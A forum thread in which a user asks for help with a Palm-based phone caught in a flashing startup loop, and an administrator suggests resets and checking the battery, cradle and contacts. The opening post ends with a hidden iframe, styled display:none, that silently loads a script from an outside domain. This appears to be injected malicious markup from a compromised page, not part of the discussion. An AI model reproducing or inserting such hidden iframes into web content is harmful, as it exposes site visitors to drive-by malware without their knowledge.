+ Reply to Thread

Exclamation Help--Major Crash!

Help...anyone!!

I had my phone in the hotsync cradle for an hour tonight and when I came back, the charge light was flashing yellow and when I picked it up, the display screen would only flash the screen with the palm startup view on it. These death flashes cannot be interrupted. I did the reset button and it gave me the choice to delete all data, and neither a yes nor a no would stop the flashes.

I have had it nine months with no trouble at all--suddenly nothing. I even have the hotsynce cradle plugged directly into the power supply backup in case of emergencies--the backup even has a surge suppressor and the computer also plugged into it is fine--what's up? Help!!!!!!

I switched out the other battery that was fully charged--still death flashes!!

Lost in OZ...help me get back to Kansas!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

try a warm reset.

but most times when you get to that point (flashing screen) you almost have to cold boot...

yellow light sounds like a battery issue... what were you doing when yuo put it in the cradle...?

Angry cold boot

I finally got the cold boot...

Could a failing battery cause the system to crash? Or would it just run out of power?

Since I have had this less than a year I wonder if Sprint would honor a battery replacement?

reloading today....I have Backup Buddy, so it should be pretty easy.

Battery

btw, I wasn't doing anything when I put it in the cradle, I just came into my office and put it there to charge while I was at a meeting.

I have had some trouble charging lately. It would charge all night, the light would be green, but the battery light would be flashing.

Also, I keep my cradle at the office and I use a travel charger at home for overnight charging--and I charge every night. I have found that I always charged with the phone face up--when I started having trouble charging--the plug light would start flashing yellow, I found that if I charged the phone laying face down, the travel charger plug into the phone made better contact (presumably because of months of gravity pushing it the other way.)

Anyway, I am still puzzled as to whether or not a dying battery can crash the system.

Thanks.

Administrator

Arrow

you could have a bad batery or bad cradle. the yellow light indicates the charger and battery are not talking correctly to each other...

have you cleaned the contacts on tbe battery and charger?

if not dirt or debris is present on the charger, id take it back to get a new one...